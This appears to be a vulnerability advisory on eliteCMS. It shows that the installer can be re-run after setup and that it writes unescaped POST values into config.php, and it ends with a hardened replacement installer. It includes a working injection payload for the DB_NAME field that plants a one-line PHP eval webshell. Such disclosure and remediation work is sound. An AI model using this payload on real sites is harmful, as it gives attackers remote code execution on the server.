eliteCMS: installer not locked after setup + one-line PHP backdoor written to config

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked once installation has finished, so an attacker who can reach the installer URL can simply run the installation again.

The second problem is that the installer writes a one-line PHP backdoor (a "一句话" webshell) straight into admin/includes/config.php.
Let's look at the code:

    ...
    elseif ($_GET['step'] == "4") {
        $file = "../admin/includes/config.php";
        $write = "<?php\n";
        $write .= "/**\n";
        $write .= "*\n";
        $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
        $write .= "*\n";
        $write .= "*/\n";
        $write .= "\n";
        // The session values are interpolated raw into PHP source: no quoting, no escaping.
        $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
        $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
        $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
        $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
        $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
        $write .= "if (!\$connection) {\n";
        $write .= "        die(\"Database connection failed\" .mysql_error());\n";
        $write .= "        \n";
        $write .= "} \n";
        $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
        $write .= "if (!\$db_select) {\n";
        $write .= "        die(\"Database select failed\" .mysql_error());\n";
        $write .= "        \n";
        $write .= "} \n";
        $write .= "?>\n";

        // The assembled source is written to the web-accessible config file as-is.
        $writer = fopen($file, 'w');
    ...

Now look at where those session values come from:

    $_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
    $_SESSION['DB_NAME'] = $_POST['DB_NAME'];
    $_SESSION['DB_USER'] = $_POST['DB_USER'];
    $_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from the request without any validation.
If the DB_NAME POST field is set to:

    "?><?php eval($_POST[c]);?><?php

a one-line backdoor ends up written into /admin/includes/config.php.
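Added example (not code from the post or from the eliteCMS project): a hardened version of the installer's config-writing step in PHP, showing the three fixes a maintainer would apply: a lock file that disables the installer after a successful run, a whitelist on the database settings before they are stored in the session, and emitting each value with var_export() so it becomes a properly quoted PHP string literal instead of raw source. The file name install.lock, the step numbers, and the helper names are assumptions for illustration.

```php
<?php
// Added example, not eliteCMS code. The lock path, step numbers and helper
// names below are assumptions made for illustration.

define('INSTALL_LOCK', __DIR__ . '/install.lock');                  // assumed path
define('CONFIG_FILE',  __DIR__ . '/../admin/includes/config.php');

// Fix 1: refuse to run the installer once it has completed.
function install_is_locked(): bool {
    return file_exists(INSTALL_LOCK);
}

// Fix 2: validate every posted value before it is stored in the session.
// Host, database name and user name get a conservative whitelist; the
// password may contain anything but is never pasted raw into PHP source.
function validate_db_settings(array $input): array {
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]+(:\d{1,5})?$/',   // host or host:port
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',           // MySQL identifier
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
    ];
    $clean = [];
    foreach ($rules as $key => $re) {
        $value = isset($input[$key]) ? (string) $input[$key] : '';
        if (!preg_match($re, $value)) {
            throw new InvalidArgumentException("Rejected value for $key");
        }
        $clean[$key] = $value;
    }
    $clean['DB_PASS'] = isset($input['DB_PASS']) ? (string) $input['DB_PASS'] : '';
    return $clean;
}

// Fix 3: emit each value as a PHP string literal via var_export(), so quotes,
// "?>" or "<?php" inside a value stay inside the literal. No closing tag is
// written at all, so there is nothing for injected text to "close".
function build_config(array $cfg): string {
    $src = "<?php\n// Generated by the installer; do not edit by hand.\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $src .= sprintf("define('%s', %s);\n", $key, var_export($cfg[$key], true));
    }
    return $src;
}

// Defence in depth: tokenize the generated source and confirm it contains
// exactly one open tag and no close tag before it is put in place.
function assert_single_script(string $src): void {
    $opens = 0;
    foreach (token_get_all($src) as $tok) {
        if (!is_array($tok)) {
            continue;
        }
        if ($tok[0] === T_OPEN_TAG) {
            $opens++;
        } elseif ($tok[0] === T_CLOSE_TAG) {
            throw new RuntimeException('Generated config contains a close tag');
        }
    }
    if ($opens !== 1) {
        throw new RuntimeException('Generated config contains extra open tags');
    }
}

// Write atomically: build in a temp file, verify, then rename into place.
function write_config(string $file, array $cfg): void {
    $src = build_config($cfg);
    assert_single_script($src);
    $tmp = $file . '.tmp';
    if (file_put_contents($tmp, $src, LOCK_EX) === false || !rename($tmp, $file)) {
        throw new RuntimeException("Cannot write $file");
    }
}

// Request handling that replaces the original step logic.
if (install_is_locked()) {
    http_response_code(403);
    exit('Installer is locked; delete install.lock to run it again.');
}
session_start();
$step = isset($_GET['step']) ? $_GET['step'] : '';
if ($step === '3' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    $_SESSION['db'] = validate_db_settings($_POST);     // assumed: step 3 collects DB settings
} elseif ($step === '4' && isset($_SESSION['db'])) {
    write_config(CONFIG_FILE, validate_db_settings($_SESSION['db']));
    touch(INSTALL_LOCK);                                // lock only after a successful write
}
```

With this in place the DB_NAME value shown in the post fails the identifier whitelist and is never stored; even if a value did reach build_config(), var_export() keeps it inside a single-quoted literal, and the tokenizer check refuses to install any file that does not parse as a single PHP script. The lock file closes the re-installation path independently of the input handling, which matters because the first bug alone lets anyone rewrite the database credentials.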